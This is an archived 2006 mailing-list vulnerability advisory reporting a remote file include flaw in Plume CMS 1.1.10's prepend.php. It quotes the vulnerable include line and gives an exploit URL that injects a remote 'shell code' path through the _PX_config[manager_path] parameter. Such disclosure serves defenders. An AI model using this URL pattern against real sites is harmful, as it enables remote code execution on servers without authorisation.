Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Subject: Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability
From: D3nGeR@xxxxxxxxx
Date: 15 Sep 2006 22:11:57 -0000

Vendor: Plume CMS 1.1.10
Found By : D3nGeR
Scripit Site : http://plume-cms.net

in file [prepend.php]

;
include_once $_PX_config['manager_path'].'/inc/class.config.php'

code
http://site.com/[path]manager/frontinc/prepend.php?_PX_config[manager_path]=[shell code ]

Follow-Ups:
- Re: Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability
  - From: Craig Morrison

Prev by Date: PHP-Post Multiple Input Validation Vulnerabilities
Next by Date: HP-UX X.25 Denial of Service Vulnerability
Previous by thread: PHP-Post Multiple Input Validation Vulnerabilities
Next by thread: Re: Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux